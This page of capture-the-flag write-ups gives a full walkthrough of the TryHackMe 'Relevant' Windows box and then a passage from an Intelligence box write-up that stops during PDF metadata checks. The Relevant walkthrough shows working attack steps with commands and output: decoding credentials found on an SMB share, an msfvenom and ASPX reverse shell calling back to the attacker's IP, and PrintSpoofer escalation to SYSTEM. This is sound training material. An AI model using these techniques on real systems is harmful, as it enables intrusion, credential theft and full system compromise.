thm-relevant

Relevant Writeup

yearofthepigRelevant is a medium rated widows room on TryHackMe by TheMayor. Here contents of a share on the smb which can be accessed by anyone, is relfected to a webserver which is used to get a shell on the box as IIS user and SeImpersonatePrivilege was abused to get a system shell on the box.

Port Scan

All Port

local@local:~/Documents/tryhackme/relevant$ nmap -p- --max-retries 0 --min-rate 3000 -oN allports 10.10.95.250
Warning: 10.10.95.250 giving up on port because retransmission cap hit (0).
Nmap scan report for 10.10.95.250
Host is up (0.39s latency).
Not shown: 65529 filtered ports
PORT      STATE SERVICE
80/tcp    open  http
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
3389/tcp  open  ms-wbt-server
49663/tcp open  unknown

# Nmap done at Fri Oct 23 15:08:54 2020 -- 1 IP address (1 host up) scanned in 34.12 seconds

Detailed Scan for top 1000 ports

local@local:~/Documents/tryhackme/relevant$ nmap -sC -sV -oN initial 10.10.34.139
Nmap scan report for 10.10.34.139
Host is up (0.48s latency).
Not shown: 995 filtered ports
PORT     STATE SERVICE       VERSION
80/tcp   open  http          Microsoft IIS httpd 10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds  Windows Server 2016 Standard Evaluation 14393 microsoft-ds
3389/tcp open  ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info: 
|   Target_Name: RELEVANT
|   NetBIOS_Domain_Name: RELEVANT
|   NetBIOS_Computer_Name: RELEVANT
|   DNS_Domain_Name: Relevant
|   DNS_Computer_Name: Relevant
|   Product_Version: 10.0.14393
|_  System_Time: 2020-09-21T04:45:02+00:00
| ssl-cert: Subject: commonName=Relevant
| Not valid before: 2020-07-24T23:16:08
|_Not valid after:  2021-01-23T23:16:08
|_ssl-date: 2020-09-21T04:45:41+00:00; -1s from scanner time.
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 1h23m59s, deviation: 3h07m51s, median: -1s
| smb-os-discovery: 
|   OS: Windows Server 2016 Standard Evaluation 14393 (Windows Server 2016 Standard Evaluation 6.3)
|   Computer name: Relevant
|   NetBIOS computer name: RELEVANT\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2020-09-20T21:45:03-07:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2020-09-21T04:45:02
|_  start_date: 2020-09-21T04:39:55

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Sep 21 10:30:42 2020 -- 1 IP address (1 host up) scanned in 96.97 seconds

There are a lot of ports open. So, lets start enumeration from SMB.

SMB service on Port 445

Trying Null authentication

smbmap without username and password

┌──(kali㉿puckie)-[~/thm/relevant]
└─$ smbmap -H 10.10.3.20 
[!] Authentication error on 10.10.3.20

smbmap with username and password

┌──(kali㉿puckie)-[~/thm/relevant]
└─$ smbmap -H 10.10.3.20 -u anonymous -p anonymous 
[+] Guest session IP: 10.10.3.20:445 Name: 10.10.3.20 
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
IPC$ READ ONLY Remote IPC
nt4wrksv READ, WRITE 

┌──(kali㉿puckie)-[~/thm/relevant]

I always try the smbmap to list the shares because along with the share names, it also shows the permissions.

Null authentication using smbclient

┌──(kali㉿puckie)-[~/thm/relevant]
└─$ smbclient -L 10.10.3.20 1 
Enter WORKGROUP\kali's password:

Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
nt4wrksv Disk 
SMB1 disabled -- no workgroup available

┌──(kali㉿puckie)-[~/thm/relevant]

I have found smbclient to be the most reliable to list the shares, but it does not shows the read/write permissions for the current user. Here ADMIN$C$ and IPC$ are the default administrative shares and the only thing that is non default is the nt4wrksv share.

Trying to connect to each shares

local@local:~/Documents/tryhackme/relevant$ smbclient -N  \\\\10.10.240.19\\ADMIN$
tree connect failed: NT_STATUS_ACCESS_DENIED
local@local:~/Documents/tryhackme/relevant$ smbclient -N  \\\\10.10.240.19\\C$
tree connect failed: NT_STATUS_ACCESS_DENIED
local@local:~/Documents/tryhackme/relevant$ smbclient -N  \\\\10.10.240.19\\IPC$
Try "help" to get a list of possible commands.
smb: \> dir
NT_STATUS_INVALID_INFO_CLASS listing \*
smb: \> exit
local@local:~/Documents/tryhackme/relevant$ smbclient -N  \\\\10.10.240.19\\nt4wrksv
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Sun Jul 26 03:31:04 2020
  ..                                  D        0  Sun Jul 26 03:31:04 2020
  passwords.txt                       A       98  Sat Jul 25 21:00:33 2020

                7735807 blocks of size 4096. 4934467 blocks available
smb: \> get passwords.txt

Looking at the results we can connect to 2 shares,ie IPC$ and nt4wrksv but not to 2 other shares. It is because we dont have enough permission. But we do have enough permission over share nt4wrksv and we can see a file called passwords.txt. We can mount the share to our device which will make it easier to work with.

Mounting the share on local device

local@local:~/Documents/tryhackme/relevant$ mkdir mnt
local@local:~/Documents/tryhackme/relevant$ sudo mount -t cifs //10.10.240.19/nt4wrksv mnt
Password for root@//10.10.240.19/nt4wrksv:                          
local@local:~/Documents/tryhackme/relevant$ ls -la mnt/
total 9
drwxr-xr-x 2 root     root     4096 Jul 26 03:31 .
drwxr-xr-x 5 local local 4096 Nov 13 09:36 ..
-rwxr-xr-x 1 root     root       98 Jul 25 21:00 passwords.txt

In this case we have mounted the share on our device. We could have just downloaded the file using get passwords.txt from inside the smb shell.

Content of passwords.txt

local@local:~/Documents/tryhackme/relevant$ cat passwords.txt 
Qm9iIC0gIVBAJCRXMHJEITEyMw==
QmlsbCAtIEp1dzRubmFNNG40MjA2OTY5NjkhJCQk

Decoded Content

Bob:!P@$$W0rD!123
Bill:Juw4nnaM4n420696969!$$$

We get a bunch of username and passwords. So, lets try check if the credentials are valid.

Using crackmapexec

local@local:~/Documents/tryhackme/relevant$ cat user 
Bob
Bill

local@local:~/Documents/tryhackme/relevant$ cat password
!P@$$W0rD!123
Juw4nnaM4n420696969!$$$
local@local:~/Documents/tryhackme/relevant$ crackmapexec smb 10.10.240.19 -u user -p password
SMB         10.10.240.19    445    RELEVANT         [*] Windows Server 2016 Standard Evaluation 14393 x64 (name:RELEVANT) (domain:Relevant) (signing:False) (SMBv1:True)
SMB         10.10.240.19    445    RELEVANT         [+] Relevant\Bob:!P@$$W0rD!123

CME shows that the credentials for Bob is valid. So lets try to list shares for user Bob.

Listing shares using CME for user Bob

local@local:~/Documents/tryhackme/relevant$ crackmapexec smb 10.10.240.19 -u user -p password --shares
SMB         10.10.240.19    445    RELEVANT         [*] Windows Server 2016 Standard Evaluation 14393 x64 (name:RELEVANT) (domain:Relevant) (signing:False) (SMBv1:True)
SMB         10.10.240.19    445    RELEVANT         [+] Relevant\Bob:!P@$$W0rD!123 
SMB         10.10.240.19    445    RELEVANT         [+] Enumerated shares
SMB         10.10.240.19    445    RELEVANT         Share           Permissions     Remark
SMB         10.10.240.19    445    RELEVANT         -----           -----------     ------
SMB         10.10.240.19    445    RELEVANT         ADMIN$                          Remote Admin
SMB         10.10.240.19    445    RELEVANT         C$                              Default share
SMB         10.10.240.19    445    RELEVANT         IPC$                            Remote IPC
SMB         10.10.240.19    445    RELEVANT         nt4wrksv        READ,WRITE

Looks like we have write permissions for the share nt4wrksv. But it is not over yet. If I specify some user that definitely doesnot exist like this_user_doesnot_exist, the output of the CME will be the following.

Listing shares for user this_user_doesnot_exist

local@local:~/Documents/tryhackme/relevant$ crackmapexec smb 10.10.240.19 -u 'this_doesnot_exists' -p 'this_doesnot_exist' --shares
SMB         10.10.240.19    445    RELEVANT         [*] Windows Server 2016 Standard Evaluation 14393 x64 (name:RELEVANT) (domain:Relevant) (signing:False) (SMBv1:True)
SMB         10.10.240.19    445    RELEVANT         [+] Relevant\this_doesnot_exists:this_doesnot_exist 
SMB         10.10.240.19    445    RELEVANT         [+] Enumerated shares
SMB         10.10.240.19    445    RELEVANT         Share           Permissions     Remark
SMB         10.10.240.19    445    RELEVANT         -----           -----------     ------
SMB         10.10.240.19    445    RELEVANT         ADMIN$                          Remote Admin
SMB         10.10.240.19    445    RELEVANT         C$                              Default share
SMB         10.10.240.19    445    RELEVANT         IPC$                            Remote IPC
SMB         10.10.240.19    445    RELEVANT         nt4wrksv        READ,WRITE 

CME tells us that this is a valid credential and list the shares for us, but this user possibly can not exist and if it does the password cant be the one that we provided. What CME did was, it did the anonymous authentication for the users that does not exist. But it did tell that password of one of our user is incorrect and that might be valid user on the box ie Bill. Since we have write permission of this share, if there is any chance the content of this share is reflected on the webserver, we can put a aspx shell on this share and get code execution, as for linux we would have uploaded a php shell.

Checking the HTTP service on Port 80

1

Directory Bruteforcing

local@local:~/Documents/tryhackme/relevant$ wfuzz -w /usr/share/wordlists/SecLists-master/Discovery/Web-Content/raft-medium-directories-lowercase.txt --hc 404 -t 50 http:
//10.10.126.3/FUZZ                                                                       
********************************************************
* Wfuzz 3.0.3 - The Web Fuzzer                         *
********************************************************
                                            
Target: http://10.10.126.3/FUZZ
Total requests: 26584
                                                                                        
===================================================================                                                                                                             
ID           Response   Lines    Word     Chars       Payload                                                                                                         
===================================================================
                                                                                                                                                                                
000003809:   200        31 L     55 W     703 Ch      "http://10.10.126.3/"                                                                                           
000013715:   400        6 L      26 W     324 Ch      ".."                                                                                                            
000017472:   400        6 L      26 W     324 Ch      ".."                                                                                                            
000026015:   400        6 L      26 W     324 Ch      "."                                                                                                             

But I found nothing. So I checked whether the file passwords.txt or directory nt4wrksv exists manually.

local@local:~/Documents/tryhackme/relevant$ curl http://10.10.126.3/nt4wrksv -i
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/10.0
X-Powered-By: ASP.NET
Date: Fri, 13 Nov 2020 04:26:10 GMT
Content-Length: 0

local@local:~/Documents/tryhackme/relevant$ curl http://10.10.126.3/passwords.txt -i
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/10.0
X-Powered-By: ASP.NET
Date: Fri, 13 Nov 2020 04:26:19 GMT
Content-Length: 0

And we get a 404.

Looking at the nmap all ports result we also have a port listening on 49663.

Checking port 49663

2And it turned out it is also running a HTTP service. So I also ran wfuzz aganist this.

Directory Bruteforcing

local@local:~/Documents/tryhackme/relevant$ wfuzz -w /usr/share/wordlists/SecLists-master/Discovery/Web-Content/raft-medium-directories-lowercase.txt --hc 404 -t 50 http://10.10.126.3:49663/FUZZ
********************************************************
* Wfuzz 3.0.3 - The Web Fuzzer                         *
********************************************************

Target: http://10.10.126.3:49663/FUZZ
Total requests: 26584

===================================================================
ID           Response   Lines    Word     Chars       Payload                                                                                                        
===================================================================

000000056:   301        1 L      10 W     162 Ch      "aspnet_client"                                                                                                
000003809:   200        31 L     55 W     703 Ch      "http://10.10.126.3:49663/"                                                                                    
000013715:   400        6 L      26 W     324 Ch      ".."                                                                                                           
000017472:   400        6 L      26 W     324 Ch      ".."                                                                                                           
000026015:   400        6 L      26 W     324 Ch      "."                                                                                                            

Total time: 639.9951
Processed Requests: 26533
Filtered Requests: 26528
Requests/sec.: 41.45812

This time we find a new directory but with a little search, I found aspnet_client is a folder for “resources which must be served via HTTP, but are installed on a per-server basis, rather than a per-application basis”. So it didnot seem something that the user might have created.

So the next step would be to check if the contents of the SMB service are reflected.

local@local:~/Documents/tryhackme/relevant$ curl http://10.10.126.3:49663/passwords.txt -i
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/10.0
X-Powered-By: ASP.NET
Date: Fri, 13 Nov 2020 04:33:27 GMT
Content-Length: 0
local@local:~/Documents/tryhackme/relevant$ curl http://10.10.126.3:49663/nt4wrksv/ -i
HTTP/1.1 200 OK
Server: Microsoft-IIS/10.0
X-Powered-By: ASP.NET
Date: Fri, 13 Nov 2020 04:34:21 GMT
Content-Length: 0

We get a 404 for file passwords.txt but get a 200 OK for the directory. We get exactly what we are looking for.

Checking for the file inside the SMB share

local@local:~/Documents/tryhackme/relevant$ curl http://10.10.126.3:49663/nt4wrksv/passwords.txt
[User Passwords - Encoded]
Qm9iIC0gIVBAJCRXMHJEITEyMw==
QmlsbCAtIEp1dzRubmFNNG40MjA2OTY5NjkhJCQk

Now that the content of the SMB share is reflected on the webserver and also we have write permission on that share, lets copy an aspx shell on the mounted share.

Shell as IIS

┌──(kali㉿puckie)-[~/thm/relevant]
└─$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.9.2.244 LPORT=53 -f aspx -o pwn.aspx
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 460 bytes
Final size of aspx file: 3444 bytes
Saved as: pwn.aspx

┌──(kali㉿puckie)-[~/thm/relevant]

Aspx shell

local@local:~/Documents/tryhackme/relevant$ cp /opt/aspx-reverse-shell/shell.aspx shell.aspx

You can find plenty of aspx shell on the internet.

Changing the content of the shell

local@local:~/Documents/tryhackme/relevant$ ifconfig tun0 | grep -i 'inet ' | awk -F " " '{print $2}'
10.6.31.213

Changed content

    protected void Page_Load(object sender, EventArgs e)
    {
        String host = "10.6.31.213"; //CHANGE THIS
            int port = 9001; ////CHANGE THIS
                
        CallbackShell(host, port);
    }

We have changed the contents with our IP and the port that we will be listening on.

Netcat listener on port 9001

local@local:~/Documents/tryhackme/relevant$ rlwrap nc -nvlp 9001
Listening on 0.0.0.0 9001

And notice something different here. I am using rlwrap which can be installed from apt store. As on linux the returned shell would not have autocompletion or arrow keys functions so, we used to get a interactive shell using python or socat. Here using rlwrap we can get the functionality of the arrow keys only.

Copying the shell inside mnt

local@local:~/Documents/tryhackme/relevant$ sudo cp shell.aspx mnt/shell.aspx
[sudo] password for local: 
local@local:~/Documents/tryhackme/relevant$ ls -la mnt
total 25
drwxr-xr-x 2 root     root      4096 Nov 13 10:31 .
drwxr-xr-x 5 local local  4096 Nov 13 10:26 ..
-rwxr-xr-x 1 root     root        98 Jul 25 21:00 passwords.txt
-rwxr-xr-x 1 root     root     15970 Nov 13 10:31 shell.aspx

Visiting the shell.aspx

local@local:~/Documents/tryhackme/relevant$ curl http://10.10.126.3:49663/nt4wrksv/shell.aspx

We do not get ouptut and if we check the netcat listener, we get a shell back.

local@local:~/Documents/tryhackme/relevant$ rlwrap nc -nvlp 9001
Listening on 0.0.0.0 9001
Connection received on 10.10.126.3 49838
Spawn Shell...
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

c:\windows\system32\inetsrv>whoami
whoami
iis apppool\defaultapppool

Here we are running as IIS user which is a service account on the windows box. It is similiar to www-data on the linux box. As we have a shell as iis, we can read the content of the inetpub directory which contains the content of the webserver. inetpub can be thought as the /var/www/html in the linux system.

Privilege Escalation

The first thing that I do on the linux on is checking the sudoers entry using sudo -l and on the windows we have to first check the privilege assigned to the user that we are running as. Since we are running as IIS, it is likely that the service accounts have more privileges than the normal user account. Privileges are something that when enabled gives the low privilege user to do some privileged operation.

Listing privileges using whoami /priv

c:\inetpub>whoami /priv
whoami /priv

PRIVILEGES INFORMATION
----------------------
[]
Privilege Name                Description                               State   
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeAuditPrivilege              Generate security audits                  Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled 
SeImpersonatePrivilege        Impersonate a client after authentication Enabled 
SeCreateGlobalPrivilege       Create global objects                     Enabled 
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled

We can see that few of the privileges are enabled for our user. And we can use the SeImpersonatePrivilege to get the shell as authority/system. If you have having a very hard time with the privilege escalation on windows, you could solve windows10privesc by Tib3rius and windowsprivescarena by TCM.

Getting a system shell

3So I will be using printSpoofer to get a system shell.

Downloading the file to the box from

local@local:~/Documents/tryhackme/relevant$ wget https://github.com/itm4n/PrintSpoofer/releases/download/v1.0/PrintSpoofer64.exe -O PrintSpoofer.exe
--2020-11-13 10:56:35--  https://github.com/itm4n/PrintSpoofer/releases/download/v1.0/PrintSpoofer64.exe
Resolving github.com (github.com)... 13.250.177.223
Connecting to github.com (github.com)|13.250.177.223|:443... connected.
HTTP request sent, awaiting response... 302 Found
HTTP request sent, awaiting response... 200 OK
Length: 27136 (26K) [application/octet-stream]
Saving to: ‘PrintSpoofer.exe’

PrintSpoofer.exe                            100%[===========================================================================================>]  26.50K   109KB/s    in 0.2s    

2020-11-13 10:56:37 (109 KB/s) - ‘PrintSpoofer.exe’ saved [27136/27136]

Lets upload this file differently using smbclient.

local@local:~/Documents/tryhackme/relevant$ smbclient -N \\\\10.10.184.223\\nt4wrksv
Try "help" to get a list of possible commands.
smb: \> put PrintSpoofer.exe
putting file PrintSpoofer.exe as \PrintSpoofer.exe (19.2 kb/s) (average 15.1 kb/s)
smb: \> 

Listing the content

c:\inetpub\wwwroot>dir                   
dir                                                                                     
 Volume in drive C has no label.                                                        
 Volume Serial Number is AC3C-5CB5                             
 Directory of c:\inetpub\wwwroot\nt4wrksv

11/12/2020  10:09 PM    <DIR>          .
11/12/2020  10:09 PM    <DIR>          ..
07/25/2020  07:15 AM                98 passwords.txt
11/12/2020  10:09 PM            27,136 PrintSpoofer.exe
11/12/2020  10:08 PM            15,970 shell.aspx
               3 File(s)         43,204 bytes
               2 Dir(s)  20,269,436,928 bytes free

Execution on the windows box

c:\inetpub\wwwroot\nt4wrksv>PrintSpoofer.exe -i -c cmd
PrintSpoofer.exe -i -c cmd
[+] Found privilege: SeImpersonatePrivilege
[+] Named pipe listening...
[+] CreateProcessAsUser() OK
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
nt authority\system

And now we are nt authority\system.

Reading the root flag

C:\Windows\system32>cd \users\administrator\desktop
cd \users\administrator\desktop

C:\Users\Administrator\Desktop>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is AC3C-5CB5

 Directory of C:\Users\Administrator\Desktop

07/25/2020  07:24 AM    <DIR>          .
07/25/2020  07:24 AM    <DIR>          ..
07/25/2020  07:25 AM                35 root.txt
               1 File(s)             35 bytes
               2 Dir(s)  20,269,117,440 bytes free

C:\Users\Administrator\Desktop>type root.txt
type root.txt
THM{1fk5kf****************45pv}

.

 

Protected: thm-overpass2

This content is password protected. To view it please enter your password below:

Posted on

htb-intelligence-nl

Enumeration

NMAP

# Nmap scan as: nmap -A -v -T4 -Pn -oN intial.nmap intelligence.htb
Increasing send delay for 10.129.80.199 from 0 to 5 due to 25 out of 61 dropped probes since last increase.
adjust_timeouts2: packet supposedly had rtt of 10052524 microseconds.  Ignoring time.
adjust_timeouts2: packet supposedly had rtt of 10052524 microseconds.  Ignoring time.
Increasing send delay for 10.129.80.199 from 5 to 10 due to 14 out of 34 dropped probes since last increase.
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
Nmap scan report for intelligence.htb (10.129.80.199)
Host is up (0.57s latency).
Not shown: 988 filtered ports
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
80/tcp   open  http          Microsoft IIS httpd 10.0
|_http-favicon: Unknown favicon MD5: 556F31ACD686989B1AFCF382C05846AA
| http-methods: 
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Intelligence
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2021-07-05 13:18:02Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.intelligence.htb
| Subject Alternative Name: othername:<unsupported>, DNS:dc.intelligence.htb
| Issuer: commonName=intelligence-DC-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2021-04-19T00:43:16
| Not valid after:  2022-04-19T00:43:16
| MD5:   7767 9533 67fb d65d 6065 dff7 7ad8 3e88
|_SHA-1: 1555 29d9 fef8 1aec 41b7 dab2 84d7 0f9d 30c7 bde7
|_ssl-date: 2021-07-05T13:19:42+00:00; +6h59m58s from scanner time.
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.intelligence.htb
| Subject Alternative Name: othername:<unsupported>, DNS:dc.intelligence.htb
| Issuer: commonName=intelligence-DC-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2021-04-19T00:43:16
| Not valid after:  2022-04-19T00:43:16
| MD5:   7767 9533 67fb d65d 6065 dff7 7ad8 3e88
|_SHA-1: 1555 29d9 fef8 1aec 41b7 dab2 84d7 0f9d 30c7 bde7
|_ssl-date: 2021-07-05T13:19:43+00:00; +6h59m57s from scanner time.
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.intelligence.htb
| Subject Alternative Name: othername:<unsupported>, DNS:dc.intelligence.htb
| Issuer: commonName=intelligence-DC-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2021-04-19T00:43:16
| Not valid after:  2022-04-19T00:43:16
| MD5:   7767 9533 67fb d65d 6065 dff7 7ad8 3e88
|_SHA-1: 1555 29d9 fef8 1aec 41b7 dab2 84d7 0f9d 30c7 bde7
|_ssl-date: 2021-07-05T13:19:42+00:00; +6h59m57s from scanner time.
3269/tcp open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.intelligence.htb
| Subject Alternative Name: othername:<unsupported>, DNS:dc.intelligence.htb
| Issuer: commonName=intelligence-DC-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2021-04-19T00:43:16
| Not valid after:  2022-04-19T00:43:16
| MD5:   7767 9533 67fb d65d 6065 dff7 7ad8 3e88
|_SHA-1: 1555 29d9 fef8 1aec 41b7 dab2 84d7 0f9d 30c7 bde7
|_ssl-date: 2021-07-05T13:19:43+00:00; +6h59m57s from scanner time.
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
No OS matches for host
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=256 (Good luck!)
IP ID Sequence Generation: Incremental
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 6h59m56s, deviation: 0s, median: 6h59m56s
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2021-07-05T13:19:08
|_  start_date: N/A

TRACEROUTE (using port 80/tcp)
HOP RTT       ADDRESS
1   825.63 ms 10.10.14.1
2   829.73 ms intelligence.htb (10.129.80.199)

Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap Scan done  -- 1 IP address (1 host up) scanned in 383.99 seconds

Looks like a normal Active Directory setup for windows OS.

SMB

Enum4linux

Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) 

 ========================== 
|    Target Information    |
 ========================== 
Target ........... intelligence.htb
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none


 ======================================================== 
|    Enumerating Workgroup/Domain on intelligence.htb    |
 ======================================================== 
[E] Can't find workgroup/domain


 ================================================ 
|    Nbtstat Information for intelligence.htb    |
 ================================================ 
Looking up status of 10.129.80.199
No reply from 10.129.80.199

 ========================================= 
|    Session Check on intelligence.htb    |
 ========================================= 
[+] Server intelligence.htb allows sessions using username '', password ''
[+] Got domain/workgroup name: 

 =============================================== 
|    Getting domain SID for intelligence.htb    |
 =============================================== 
Domain Name: intelligence
Domain Sid: S-1-5-21-4210132550-3389855604-3437519686
[+] Host is part of a domain (not a workgroup)

 ========================================== 
|    OS information on intelligence.htb    |
 ========================================== 
[+] Got OS info for intelligence.htb from smbclient: 
[+] Got OS info for intelligence.htb from srvinfo:
Could not initialise srvsvc. Error was NT_STATUS_ACCESS_DENIED

 ================================= 
|    Users on intelligence.htb    |
 ================================= 
[E] Couldn't find users using querydispinfo: NT_STATUS_ACCESS_DENIED

[E] Couldn't find users using enumdomusers: NT_STATUS_ACCESS_DENIED

 ============================================= 
|    Share Enumeration on intelligence.htb    |
 ============================================= 

	Sharename       Type      Comment
	---------       ----      -------
SMB1 disabled -- no workgroup available

[+] Attempting to map shares on intelligence.htb

 ======================================================== 
|    Password Policy Information for intelligence.htb    |
 ======================================================== 
[E] Unexpected error from polenum:


[+] Attaching to intelligence.htb using a NULL share

[+] Trying protocol 139/SMB...

	[!] Protocol failed: Cannot request session (Called Name:INTELLIGENCE.HT)

[+] Trying protocol 445/SMB...

	[!] Protocol failed: SAMR SessionError: code: 0xc0000022 - STATUS_ACCESS_DENIED - {Access Denied} A process has requested access to an object but has not been granted those access rights.


[E] Failed to get password policy with rpcclient


 ================================== 
|    Groups on intelligence.htb    |
 ================================== 

[+] Getting builtin groups:

[+] Getting builtin group memberships:

[+] Getting local groups:

[+] Getting local group memberships:

[+] Getting domain groups:

[+] Getting domain group memberships:

 =========================================================================== 
|    Users on intelligence.htb via RID cycling (RIDS: 500-550,1000-1050)    |
 =========================================================================== 
[E] Couldn't get SID: NT_STATUS_ACCESS_DENIED.  RID cycling not possible.

 ================================================= 
|    Getting printer info for intelligence.htb    |
 ================================================= 
Could not initialise spoolss. Error was NT_STATUS_ACCESS_DENIED


enum4linux completed

Nothing much from here so let’s try anonymous login.

Anonymous Login

root@Raj:~/HTB/Intelligence$ smbclient -L //intelligence.htb
Enter WORKGROUP\root's password: 
Anonymous login successful

        Sharename       Type      Comment
        ---------       ----      -------
SMB1 disabled -- no workgroup available

We have anonymous login but we have access to shares so let’s enumerate further.

LDAP

let’s do an ldap search for getting naming context for the AD(Active Directory).

root@Raj:~/HTB/Intelligence$ ldapsearch -x -h intelligence.htb -s base namingcontexts
# extended LDIF
#
# LDAPv3
# base <> (default) with scope baseObject
# filter: (objectclass=*)
# requesting: namingcontexts 
#

#
dn:
namingcontexts: DC=intelligence,DC=htb
namingcontexts: CN=Configuration,DC=intelligence,DC=htb
namingcontexts: CN=Schema,CN=Configuration,DC=intelligence,DC=htb
namingcontexts: DC=DomainDnsZones,DC=intelligence,DC=htb
namingcontexts: DC=ForestDnsZones,DC=intelligence,DC=htb

# search result
search: 2
result: 0 Success

# numResponses: 2
# numEntries: 1

Looks like it’s normal intelligence.htb so let’s move on from there.

Web

Looking through the webpage we can see we can get two PDF so maybe we can get some username from it’s exifdata. so let’s get the two PDF’s.

root@Raj:~/HTB/Intelligence$ wget http://intelligence.htb/documents/2020-01-01-upload.pdf

Click to access 2020-01-01-upload.pdf

Resolving intelligence.htb (intelligence.htb)... 10.129.80.199 Connecting to intelligence.htb (intelligence.htb)|10.129.80.199|:80... connected. HTTP request sent, awaiting response... 200 OK Length: 26835 (26K) [application/pdf] Saving to: ‘2020-01-01-upload.pdf’ 2020-01-01-upload.pdf 100%[===================================================================================>] 26.21K 79.8KB/s in 0.3s (79.8 KB/s) - ‘2020-01-01-upload.pdf’ saved [26835/26835] root@Raj:~/HTB/Intelligence$ wget http://intelligence.htb/documents/2020-12-15-upload.pdf

Click to access 2020-12-15-upload.pdf

Resolving intelligence.htb (intelligence.htb)... 10.129.80.199 Connecting to intelligence.htb (intelligence.htb)|10.129.80.199|:80... connected. HTTP request sent, awaiting response... 200 OK Length: 27242 (27K) [application/pdf] Saving to: ‘2020-12-15-upload.pdf’ 2020-12-15-upload.pdf 100%[===================================================================================>] 26.60K 90.0KB/s in 0.3s (90.0 KB/s) - ‘2020-12-15-upload.pdf’ saved [27242/27242]

So now let’s try and see it’s exifdata from that PDF.

root@Raj:~/HTB/Intelligence$ exiftool 2020-01-01-upload.pdf 
ExifTool Version Number         : 12.09
File Name                       : 2020-01-01-upload.pdf
Directory                       : .
File Size                       : 26 kB
File Modification Date/Time     : 2021:04:01 18:00:00+01:00
File Access Date/Time           : 2021:07:05 03:32:22+01:00
File Inode Change Date/Time     : 2021:07:05 03:32:22+01:00
File Permissions                : rw-r--r--
File Type                       : PDF
File Type Extension             : pdf
MIME Type                       : application/pdf
PDF Version                     : 1.5
Linearized                      : No
Page Count                      : 1
Creator                         : William.Lee
root@Raj:~/HTB/Intelligence$ exiftool 2020-12-15-upload.pdf 
ExifTool Version Number         : 12.09
File Name                       : 2020-12-15-upload.pdf
Directory                       : .
File Size                       : 27 kB
File Modification Date/Time     : 2021:04:01 18:00:00+01:00
File Access Date/Time           : 2021:07:05 03:32:27+01:00
